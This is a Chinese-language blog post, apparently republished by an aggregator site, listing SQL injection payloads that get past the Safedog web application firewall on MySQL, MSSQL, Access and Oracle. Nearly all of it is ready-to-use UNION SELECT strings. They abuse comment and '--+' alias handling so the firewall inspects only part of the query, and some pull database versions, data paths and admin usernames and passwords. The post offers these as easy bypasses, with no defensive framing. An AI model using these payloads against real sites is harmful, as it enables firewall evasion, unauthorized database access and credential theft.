明小子mysql_安全狗最新版SQL注入防护多种方式bypass(简简单单/各种数据库通用)...
注釋一:/**/Mysql下的繞過:1、99999=(select 1?as '/*') union all select 1 as '*//*',2,3,4,5 from mysql.user as x*/%23
2、.and 1=(select "/*") union all select 1,@@version,3,4,5 from mysql.user-- */
3、union all /*!/*!select*/1 as %27*/%27,2,3,4,5 from mysql.user%23
MSSQL下的繞過:1、數字型:.and 0=(select 1 as [/*]) union all select 1,2,3,4,5,6 from [test] as [*/]--2、字符型:xxx'and'0'=(select 1 as [/*]) union all select 1,2,3,4,5,6 from [test] as [*/]--Access下的繞過:1、數字型:.and 0=(select top 1 1 as [/*] from admin as [*//*]) union all select 1 as [*//*],2,username,password,5 from admin as [*/]2、字符型:xxx'and'0'=(select top 1 '1' as [/*] from admin as [*//*]) union all select 1 as [*//*],2,username,password,5 from admin as [*/]Oracle下的繞過:1、數字型:.and 1=(select 1 as "/*" from dual) union all select 1,2,3,4,5 from dual-- */2、字符型:xxx'and'a'=(select '/*' from dual) union all select 1,2,3 from dual where '*/'='*/'是不是感覺太麻煩了?當然有更簡單的!請看下面。注釋二:--+(瀏覽器下輸入等同于--%20)、--%2b測試發現,可以通過將--+、--%2b作為別名或直接select '--+'等來繞過安全狗。安全狗會將--+后的語句給截取掉,只拿前面的語句去進行檢查。不管是mysql、mssql、access、oracle都可以這樣繞過安全狗限制。拿Mysql做演示,如:99999=(select 1 as '--+') union all select 1,2,3,4,5 from mysql.user%23
簡簡單單就bypass了!還可以直接select '--+':99999=(select '--+') union all select 1,2,3,4,5 from mysql.user%23更簡單的:%2b'--+' union all select 1,'haha',3,4,5 from mysql.user%23
mysql下還可以這樣(僅適用于mysql):/*--+/*x/*/union all select 1,@@version,@@datadir,4,5 from mysql.user%23
還有這樣:99999=(select{--+1}) union all select 1,2,3,4,5 from mysql.user%23注意:是反引號額!注釋符“--”難道不行么?當然也有方法,不過僅限于mysql:99999=(/*!select--*/1) union all select 1,2,3,4,5 from mysql.user%23
MSSQL下的繞過:1、9999.and '1'=(select '-- ') union all select 1,2,32、xxx'and'1'=(select '-- ') union all select 1,2,33、xxx'%2b'--+'union all select 1,2,3Access下的繞過:1、.and '0'=(select top 1 '--+' from admin) union all select 1,2,3 from admin2、.and'a'%2b'--+'union all select 1,2,3 from adminOracle下的繞過:1、.and 0=(select 1 as?"--+") union all select 1,2,3 from dual--2、and'a'=(select '--+' from dual) union all select 1,2,3,4,5 from dual--
總結
以上是生活随笔為你收集整理的明小子mysql_安全狗最新版SQL注入防护多种方式bypass(简简单单/各种数据库通用)...的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 移动终端WAPI证书快速下载并自动连接解
- 下一篇: 一个厂商网站的SQL安全检测 (啊D、明